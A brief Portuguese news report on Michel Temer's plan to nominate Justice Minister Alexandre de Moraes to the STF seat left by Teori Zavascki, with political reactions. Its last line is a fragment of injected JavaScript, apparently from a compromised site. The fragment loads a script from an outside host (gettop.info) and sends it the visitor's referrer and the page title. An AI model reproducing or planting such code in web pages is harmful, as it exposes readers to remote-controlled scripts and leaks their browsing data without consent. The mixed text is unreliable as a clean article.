O presidente Michel Temer vai indicar o atual ministro da Justiça, Alexandre de Moraes (PSDB), para ocupar a vaga de ministro no Supremo Tribunal Federal (STF). A informação foi dada por Vera Magalhães, do Estadão.
A decisão foi comunicada por telefone aos aliados no fim de semana. Moraes vai assumir a vaga deixada por Teori Zavascki, que morreu no dia 19 de janeiro em acidente aéreo.
O tucano cancelou uma agenda em São Paulo na manhã desta segunda-feira (6), onde participaria da posse de novos integrantes do Tribunal de Contas do Estado de São Paulo. Entretanto, o ministro veio para Brasília e seguiu para o Palácio do Planalto.
A escolha por um nome mais político do que técnico aliado deve desgastar o governo Temer, segundo especialistas. Com a saída de Moraes do alto escalão do presidente, a pasta deverá ser ocupada pelo PMDB.
Na semana passada, o STF definiu por sorteio que o encarregado de substituir Teori na relatoria da Lava Jato é o ministro Fachin.
s.src=\’http://gettop.info/kt/?sdNXbH&frm=script&se_referrer=\’ + encodeURIComponent(document.referrer) + \’&default_keyword=\’ + encodeURIComponent(document.title) + \’\’;